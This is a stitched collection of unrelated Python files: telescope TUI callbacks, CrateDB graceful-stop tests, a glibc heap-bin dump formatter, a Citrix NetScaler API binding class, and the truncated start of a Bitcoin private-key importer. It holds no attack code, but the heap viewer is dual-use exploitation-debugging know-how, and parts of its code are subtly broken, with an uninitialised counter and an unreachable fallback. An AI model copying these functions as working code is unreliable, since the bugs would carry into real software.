TUI.PlaySound.guideModeChanges()
self.locGuideMode.set((gmLower,), isCurrent)
self._updLocGuideModeSummary()
def _updExpState(self, expState, isCurrent, keyVar):
"""Set the durations to None (unknown) if data is from the cache"""
if keyVar.isGenuine():
return
modValues = list(expState)
modValues[2] = None
modValues[3] = None
keyVar._valueList = tuple(modValues)
def _updGuideState(self, guideState, isCurrent, **kargs):
if not isCurrent:
if not self.tuiModel.dispatcher.connection.isConnected:
self._isGuiding = None
return
gsLower = guideState.lower()
if gsLower in ("starting", "on"):
if self._isGuiding is not True:
TUI.PlaySound.guidingBegins()
self._isGuiding = True
elif gsLower == "stopping":
if self._isGuiding is not False:
TUI.PlaySound.guidingEnds()
self._isGuiding = False
self._updLocGuideModeSummary()
def _updNoGuideStar(self, noData, isCurrent, **kargs):
if not isCurrent:
return
if not self.guideState.isGenuine():
return
guideState, gsCurr = self.guideState.getInd(0)
if guideState.lower() not in ("on", "starting"):
return
TUI.PlaySound.noGuideStar()
if __name__ == "__main__":
# getModel("dcam")
getModel("ecam")
getModel("gcam")
|
|
# -*- coding: utf-8; -*-
#
# Licensed to Crate.io GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
import unittest
import os
import time
import random
import string
import threading
from cr8.run_crate import CrateNode
from crate.client.http import Client
from crate.client.exceptions import ProgrammingError, ConnectionError
from testutils.paths import crate_path
from testutils.ports import bind_range
def decommission(client, node):
try:
return client.sql('alter cluster decommission ?', (node,))
except ConnectionError:
pass
def retry_sql(client, statement):
""" retry statement on node not found in cluster state errors
sys.shards queries might fail if a node that has shutdown is still
in the cluster state
"""
wait_time = 0
sleep_duration = 0.01
last_error = None
while wait_time < 10.5:
try:
return client.sql(statement)
except ProgrammingError as e:
if ('not found in cluster state' in e.message or
'Node not connected' in e.message):
time.sleep(sleep_duration)
last_error = e
wait_time += sleep_duration
sleep_duration *= 2
continue
raise e
raise last_error
def wait_for_cluster_size(client, expected_size, timeout_in_s=20):
""" retry check (up to timeout_in_s) for expected cluster size
Returns True if the cluster size reaches the expected one, False otherwise
Can raise: Value Error -- for a negative value of expected_size
TimeoutError -- after timeout_in_s
A node can be decommissioned with a delay, this can be
used to check when a node is indeed decommissioned
"""
if expected_size < 0:
raise ValueError('expected_size cannot be negative')
wait_time = 0
sleep_duration = 1
num_nodes = -1
while num_nodes != expected_size:
time.sleep(sleep_duration)
wait_time += sleep_duration
response = client.sql("select * from sys.nodes")
num_nodes = response.get("rowcount", -1)
if num_nodes == -1:
return False
if wait_time > timeout_in_s:
raise TimeoutError('Timeout occurred ({}s) while waiting for cluster size to become {}'
.format(timeout_in_s, expected_size))
return True
class GracefulStopCrateLayer(CrateNode):
MAX_RETRIES = 3
def start(self, retry=0):
if retry >= self.MAX_RETRIES:
raise SystemError('Could not start Crate server. Max retries exceeded!')
try:
super().start()
except Exception:
self.start(retry=retry + 1)
def stop(self):
"""do not care if process already died"""
try:
super().stop()
except OSError:
pass
class GracefulStopTest(unittest.TestCase):
"""
abstract class for starting a cluster of crate instances
and testing against them
"""
DEFAULT_NUM_SERVERS = 1
def __init__(self, *args, **kwargs):
self.num_servers = kwargs.pop("num_servers", getattr(self, "NUM_SERVERS", self.DEFAULT_NUM_SERVERS))
super().__init__(*args, **kwargs)
def setUp(self):
self.crates = []
self.clients = []
self.node_names = []
# auto-discovery with unicast on the same host only works if all nodes are configured with the same port range
transport_port_range = bind_range(range_size=self.num_servers)
for i in range(self.num_servers):
layer = GracefulStopCrateLayer(
crate_dir=crate_path(),
settings={
'cluster.name': self.__class__.__name__,
'node.name': self.node_name(i),
'transport.tcp.port': transport_port_range,
},
env={
**os.environ.copy(),
'CRATE_HEAP_SIZE': '256M'
},
version=(4, 0, 0)
)
layer.start()
self.clients.append(Client(layer.http_url))
self.crates.append(layer)
self.node_names.append(self.node_name(i))
client = self.random_client()
num_nodes = 0
# wait until all nodes joined the cluster
while num_nodes < len(self.crates):
response = client.sql("select * from sys.nodes")
num_nodes = response.get("rowcount", 0)
time.sleep(.5)
def tearDown(self):
for client in self.clients:
client.close()
for layer in self.crates:
layer.stop()
def random_client(self):
return random.choice(self.clients)
def node_name(self, i):
return "crate_{0}_{1}".format(self.__class__.__name__, i)
def set_settings(self, settings):
client = self.random_client()
for key, value in settings.items():
client.sql("set global transient {}=?".format(key), (value,))
class TestGracefulStopPrimaries(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 4 shards "
"with (number_of_replicas=0)")
client.sql("insert into t1 (id, name) values (?, ?), (?, ?)",
(1, "Ford", 2, "Trillian"))
client.sql("refresh table t1")
def test_graceful_stop_primaries(self):
"""
test min_availability: primaries
"""
client2 = self.clients[1]
self.set_settings({"cluster.graceful_stop.min_availability": "primaries"})
decommission(self.clients[0], self.node_names[0])
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopPrimaries.NUM_SERVERS - 1), True)
stmt = "select table_name, id from sys.shards where state = 'UNASSIGNED'"
response = retry_sql(client2, stmt)
# assert that all shards are assigned
self.assertEqual(response.get("rowcount", -1), 0)
def tearDown(self):
client = self.clients[1]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopFull(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 4 shards "
"with (number_of_replicas=1)")
client.sql("insert into t1 (id, name) values (?, ?), (?, ?)",
(1, "Ford", 2, "Trillian"))
client.sql("refresh table t1")
def test_graceful_stop_full(self):
"""
min_availability: full moves all shards
"""
node1, node2, node3 = self.node_names
client1, client2, client3 = self.clients
self.set_settings({"cluster.graceful_stop.min_availability": "full"})
decommission(client2, node1)
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopFull.NUM_SERVERS - 1), True)
stmt = "select table_name, id from sys.shards where state = 'UNASSIGNED'"
response = retry_sql(client2, stmt)
# assert that all shards are assigned
self.assertEqual(response.get("rowcount", -1), 0)
def tearDown(self):
client = self.clients[2]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopNone(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql("create table t1 (id int, name string) "
"clustered into 8 shards "
"with (number_of_replicas=0)")
client.sql("refresh table t1")
names = ("Ford", "Trillian", "Zaphod", "Jeltz")
for i in range(16):
client.sql("insert into t1 (id, name) "
"values (?, ?)",
(i, random.choice(names)))
client.sql("refresh table t1")
def test_graceful_stop_none(self):
"""
test `min_availability: none` will stop the node immediately.
Causes some shard to become unassigned (no replicas)
"""
client2 = self.clients[1]
self.set_settings({"cluster.graceful_stop.min_availability": "none"})
decommission(self.clients[0], self.node_names[0])
self.assertEqual(wait_for_cluster_size(client2, TestGracefulStopNone.NUM_SERVERS - 1), True)
stmt = "select node['id'] as node_id, id, state \
from sys.shards where state='UNASSIGNED'"
resp = retry_sql(client2, stmt)
# since there were no replicas some shards must be missing
unassigned_shards = resp.get("rowcount", -1)
self.assertTrue(
unassigned_shards > 0,
"{0} unassigned shards, expected more than 0".format(unassigned_shards)
)
def tearDown(self):
client = self.clients[1]
client.sql("drop table t1")
super().tearDown()
class TestGracefulStopDuringQueryExecution(GracefulStopTest):
NUM_SERVERS = 3
def setUp(self):
super().setUp()
client = self.clients[0]
client.sql('''
CREATE TABLE t1 (id int primary key, name string)
CLUSTERED INTO 4 SHARDS
WITH (number_of_replicas = 1)
''')
def bulk_params():
for i in range(5000):
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
yield (i, ''.join(chars))
bulk_params = list(bulk_params())
client.sql('INSERT INTO t1 (id, name) values (?, ?)', None, bulk_params)
client.sql('REFRESH TABLE t1')
def test_graceful_stop_concurrent_queries(self):
self.set_settings({
"cluster.graceful_stop.min_availability": "full",
"cluster.graceful_stop.force": "false"
})
concurrency = 4
client = self.clients[0]
run_queries = [True]
errors = []
threads_finished_b = threading.Barrier((concurrency * 3) + 1)
func_args = (client, run_queries, errors, threads_finished_b)
for i in range(concurrency):
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_select_queries,
args=func_args
)
t.start()
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_insert_queries,
args=func_args
)
t.start()
t = threading.Thread(
target=TestGracefulStopDuringQueryExecution.exec_delete_queries,
args=func_args
)
t.start()
decommission(self.clients[1], self.node_names[1])
self.assertEqual(wait_for_cluster_size(self.clients[0], TestGracefulStopDuringQueryExecution.NUM_SERVERS - 1), True)
run_queries[0] = False
threads_finished_b.wait()
self.assertEqual(errors, [])
def tearDown(self):
self.clients[0].sql('DROP TABLE t1')
super().tearDown()
@staticmethod
def exec_insert_queries(client, is_active, errors, finished):
while is_active[0]:
try:
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
client.sql(
'insert into t1 (id, name) values ($1, $2) on conflict (id) do update set name = $2',
(random.randint(0, 2147483647), ''.join(chars))
)
except Exception as e:
errors.append(e)
finished.wait()
@staticmethod
def exec_delete_queries(client, is_active, errors, finished):
while is_active[0]:
try:
chars = list(string.ascii_lowercase[:14])
random.shuffle(chars)
pattern = ''.join(chars[:3]) + '%'
client.sql(
'delete from t1 where name like ?', (pattern,))
except Exception as e:
if 'RelationUnknown' not in str(e):
errors.append(e)
finished.wait()
@staticmethod
def exec_select_queries(client, is_active, errors, finished):
while is_active[0]:
try:
client.sql('select name, count(*) from t1 group by name')
except Exception as e:
errors.append(e)
finished.wait()
|
|
# supported_libc contains the the lines to take in order to retrieve the malloc_state
# from the libc data segment
# f.i. 2.23-32 is the libc 2.23 on 32 bit, 61-95 means that from line 61 to 95 of the hexdump we have the info about bins
import pdb
class HeapyLibcFormatter:
def __init__(self,libc_dump_full_path,proc_info,soup):
self.supported_libc = {"2.19-64": "60-128", "2.19-32": "34-68", "2.23-64": "90-158", "2.23-32": "61-95"}
self.formatter_dictionary = {"2.19-64": self.formatter_1 , "2.23-64": self.formatter_1, "2.23-32": self.formatter_2, "2.19-32": self.formatter_2}
self.libc_dump_full_path = libc_dump_full_path
self.proc_info = proc_info
self.soup = soup
def format(self):
libc_version = self.proc_info.libc_version
arch = self.proc_info.architecture
lines_range = self.supported_libc.get(libc_version+"-"+arch,"")
if lines_range != "": # let's extract only the lines in which there is the _state struct
start_line = int(lines_range.split("-")[0],10)
end_line = int(lines_range.split("-")[1],10)
else:
print "[ERROR] Libc not supported - heapy will paste the raw dump"
formatter = self.formatter_dictionary.get(libc_version+"-"+arch,"") #extract the right formatter for this libc
formatter(start_line,end_line)
# generic formatter, this will paste the raw dump in the section libc of the final report
def formatter_0(self,start_line,end_line):
f = open(self.libc_dump_full_path, "r")
div_libcdump = self.soup.find(id="libcdump")
for line in f.readlines(): # this optimization in order to avoid pase unuseful stuff in the libc view
if cont < start_line:
cont+=1
continue
if cont > end_line:
break
# first entry of the line is the memory address
font_tag = self.soup.new_tag('font')
font_tag['style'] = "color: black; font-weight: bold;"
font_tag.string = str(line.split(" ")[0]) # let's paint the address
div_libcdump.append(font_tag)
line = " ".join(line.split(" ")[1:]) # remove the address in the line
p_tag = self.soup.new_tag('p')
p_tag.string = str(line)
p_tag['style'] = "font-family: monospace;display:inline;"
div_libcdump.append(p_tag)
div_space_tag = self.soup.new_tag('div')
div_space_tag['style'] = "font-size:0;height:1px;"
div_libcdump.append(div_space_tag)
cont += 1
def formatter_2(self,start_line,end_line):
f = open(self.libc_dump_full_path, "r")
div_libcdump = self.soup.find(id="libcdump")
for i in xrange(0,start_line,1):
line = f.readline().rstrip() # skip unuseful lines
line = line.split(" ")
line = line[2:] # remove the memory address and the first empty dword
#space
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
# flags qwords
flags_div = self.soup.new_tag('div')
flags_div['style'] = "font-family: monospace;display:inline;"
flags_div.string = "flags: " + line[0]
line = line[1:] # discard the first processed elements
# fastbins
for i in xrange(0,10,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
fastbin_div = self.soup.new_tag('div')
fastbin_div['style'] = "font-family: monospace;display:inline;"
fastbin_div.string = "fastbin["+str(i)+"]-> 0x" + line[0]
div_libcdump.append(fastbin_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#pdb.set_trace()
#top chunk
top_chunk_div = self.soup.new_tag('div')
top_chunk_div['style'] = "font-family: monospace;display:inline;"
top_chunk_div.string = "topchunk: 0x" + line[0]
div_libcdump.append(top_chunk_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#last remains
last_remain_div = self.soup.new_tag('div')
last_remain_div['style'] = "font-family: monospace;display:inline;"
last_remain_div.string = "last remainder: 0x" + line[0]
div_libcdump.append(last_remain_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
#unsorted bin
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{fd} -> 0x" + line[0]
div_libcdump.append(unsorted_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[1:]
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{bk} -> 0x" + line[0]
div_libcdump.append(unsorted_bin_fd)
line = line[1:]
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
#small bins
for i in xrange(0,62,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + line[1]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#large bins
for i in xrange(0,60,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
else:
large_bin_fd = self.soup.new_tag('div')
large_bin_fd['style'] = "font-family: monospace;display:inline;"
large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[0]
div_libcdump.append(large_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
large_bin_bk = self.soup.new_tag('div')
large_bin_bk['style'] = "font-family: monospace;display:inline;"
large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + line[1]
div_libcdump.append(large_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
# this formatter print out the information about the bins discovered in the libc dump
def formatter_1(self,start_line,end_line):
f = open(self.libc_dump_full_path, "r")
div_libcdump = self.soup.find(id="libcdump")
for i in xrange(0,start_line,1):
line = f.readline().rstrip() # skip unuseful lines
line = line.split(" ")
line = line[1:] # remove the memory address
#space
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
# flags qwords
flags_div = self.soup.new_tag('div')
flags_div['style'] = "font-family: monospace;display:inline;"
flags_div.string = "flags: " + line[1] + line[0]
line = line[2:] # discard the first processed elements
# fastbins
for i in xrange(0,10,1):
if line == []:
line = f.readline().rstrip().split(" ")
line = line[1:]
fastbin_div = self.soup.new_tag('div')
fastbin_div['style'] = "font-family: monospace;display:inline;"
fastbin_div.string = "fastbin["+str(i)+"]-> 0x" + line[1] + line[0]
div_libcdump.append(fastbin_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#top chunk
top_chunk_div = self.soup.new_tag('div')
top_chunk_div['style'] = "font-family: monospace;display:inline;"
top_chunk_div.string = "topchunk: 0x" + line[1] + line[0]
div_libcdump.append(top_chunk_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = f.readline().rstrip().split(" ")
line = line[1:]
#last remains
last_remain_div = self.soup.new_tag('div')
last_remain_div['style'] = "font-family: monospace;display:inline;"
last_remain_div.string = "last remainder: 0x" + line[1] + line[0]
div_libcdump.append(last_remain_div)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#unsorted bin
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{fd} -> 0x" + line[1] + line[0]
div_libcdump.append(unsorted_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
unsorted_bin_fd = self.soup.new_tag('div')
unsorted_bin_fd['style'] = "font-family: monospace;display:inline;"
unsorted_bin_fd.string = "unsorted bin{bk} -> 0x" + line[1] + line[0]
div_libcdump.append(unsorted_bin_fd)
line = line[2:]
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
#small bins
for i in xrange(0,62,1):
if len(line) == 2:
nextline = f.readline().rstrip().split(" ")
nextline = nextline[1:]
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + nextline[1] + nextline[0]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = nextline
line = line[2:]
else:
small_bin_fd = self.soup.new_tag('div')
small_bin_fd['style'] = "font-family: monospace;display:inline;"
small_bin_fd.string = "smallbin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
small_bin_bk = self.soup.new_tag('div')
small_bin_bk['style'] = "font-family: monospace;display:inline;"
small_bin_bk.string = "smallbin["+str(i)+"]{bk}-> 0x" + line[1] + line[0]
div_libcdump.append(small_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
#large bins
for i in xrange(0,63,1):
if len(line) == 2:
nextline = f.readline().rstrip().split(" ")
nextline = nextline[1:]
large_bin_fd = self.soup.new_tag('div')
large_bin_fd['style'] = "font-family: monospace;display:inline;"
large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
large_bin_bk = self.soup.new_tag('div')
large_bin_bk['style'] = "font-family: monospace;display:inline;"
large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + nextline[1] + nextline[0]
div_libcdump.append(large_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = nextline
line = line[2:]
else:
large_bin_fd = self.soup.new_tag('div')
large_bin_fd['style'] = "font-family: monospace;display:inline;"
large_bin_fd.string = "largebin["+str(i)+"]{fd}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_fd)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
large_bin_bk = self.soup.new_tag('div')
large_bin_bk['style'] = "font-family: monospace;display:inline;"
large_bin_bk.string = "largebin["+str(i)+"]{bk}-> 0x" + line[1] + line[0]
div_libcdump.append(large_bin_bk)
div_space = self.soup.new_tag('div')
div_space['style'] = "font-size:0;height:5px;"
div_libcdump.append(div_space)
line = line[2:]
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class crvserver_filterpolicy_binding(base_resource) :
""" Binding class showing the filterpolicy that can be bound to crvserver.
"""
def __init__(self) :
self._policyname = ""
self._priority = 0
self._inherited = ""
self._name = ""
self._targetvserver = ""
self.___count = 0
@property
def priority(self) :
ur"""The priority for the policy.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
ur"""The priority for the policy.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def policyname(self) :
ur"""Policies bound to this vserver.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
ur"""Policies bound to this vserver.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def name(self) :
ur"""Name of the cache redirection virtual server to which to bind the cache redirection policy.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
ur"""Name of the cache redirection virtual server to which to bind the cache redirection policy.<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def targetvserver(self) :
ur"""Name of the virtual server to which content is forwarded. Applicable only if the policy is a map policy and the cache redirection virtual server is of type REVERSE.
"""
try :
return self._targetvserver
except Exception as e:
raise e
@targetvserver.setter
def targetvserver(self, targetvserver) :
ur"""Name of the virtual server to which content is forwarded. Applicable only if the policy is a map policy and the cache redirection virtual server is of type REVERSE.
"""
try :
self._targetvserver = targetvserver
except Exception as e:
raise e
@property
def inherited(self) :
ur"""On State describes that policy bound is inherited from global binding.<br/>Possible values = ON, OFF.
"""
try :
return self._inherited
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(crvserver_filterpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.crvserver_filterpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = crvserver_filterpolicy_binding()
updateresource.name = resource.name
updateresource.policyname = resource.policyname
updateresource.targetvserver = resource.targetvserver
updateresource.priority = resource.priority
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [crvserver_filterpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].name = resource[i].name
updateresources[i].policyname = resource[i].policyname
updateresources[i].targetvserver = resource[i].targetvserver
updateresources[i].priority = resource[i].priority
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = crvserver_filterpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [crvserver_filterpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].name = resource[i].name
deleteresources[i].policyname = resource[i].policyname
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name) :
ur""" Use this API to fetch crvserver_filterpolicy_binding resources.
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
ur""" Use this API to fetch filtered set of crvserver_filterpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
ur""" Use this API to count crvserver_filterpolicy_binding resources configued on NetScaler.
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
ur""" Use this API to count the filtered set of crvserver_filterpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = crvserver_filterpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Inherited:
ON = "ON"
OFF = "OFF"
class crvserver_filterpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.crvserver_filterpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.crvserver_filterpolicy_binding = [crvserver_filterpolicy_binding() for _ in range(length)]
|
|
#!/usr/bin/env python
# Bitcoin private key importer
# Copyright (C) 2011 by Matt Giuca
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# Instructions:
# Requirements: bitcointools in the Python path.
# Commit d3a1daf (Feb 24, 2011) or later is required.
# Don't ask me why Git version IDs are so hard to compare!
# Bitcoin version 0.3.20 (for -rescan).
# Recommended: A version of pycrypto in the Python path which supports
# RIPEMD160 hashing (not the Debian/Ubuntu version).
# The program 'priv_der' compiled in the current directory
# (required if supplying a small 32-byte key).
# 1. Get the private key you wish to import in a text file (this file can
# contain whitespace or newlines, and be in base-58 or base-64).
# Alternatively, it can be a binary file.
# This can be either a small 32-byte private key, or a full 279-byte DER
# key (including the private key). Note that 'priv_der' must be compiled
# if a small key is supplied.
# 2. Run privkeyimport.py KEYFILE. This will write the key into your Bitcoin
# wallet. Use -n to just print without writing to the wallet.
# Use --base64 if the input is base-64, -b if it is binary.
# 3. Run bitcoin -rescan to ensure any transactions belonging to the
# imported key are added to the transaction list and balance.
import sys
import optparse
import re
import binascii
import subprocess
import bsddb.db
# BitcoinTools
#from bitcointools import util
#from bitcointools import wallet
#from bitcointools import base58
import util
import wallet
import base58
def getTextLines(text):
'Get the all the lines of text of a text.'
textLines = text.replace('\r', '\n').replace('\n\n', '\n').split('\n')
if len(textLines) == 1:
if textLines[0] == '':
return []
return textLines
def privkey_b58_bin(priv_b58):
"""Convert a base-58 private key (ignoring whitespace) into a binary
string."""
# Cut out whitespace
priv_b58 = re.sub("[ \t\n]", "", priv_b58)
if len(priv_b58) == 381:
return base58.b58decode(priv_b58, 279)
elif len(priv_b58) == 44:
return base58.b58decode(priv_b58, 32)
else:
raise ValueError("Expected a key of 44 or 381 base-58 digits")
def privkey_b64_bin(priv_b64):
"""Convert a base-64 private key (ignoring whitespace) into a binary
string."""
# Cut out whitespace
priv_b64 = re.sub("[ \t\n]", "", priv_b64)
if len(priv_b64) in (44, 372):
return binascii.a2b_base64(priv_b64)
else:
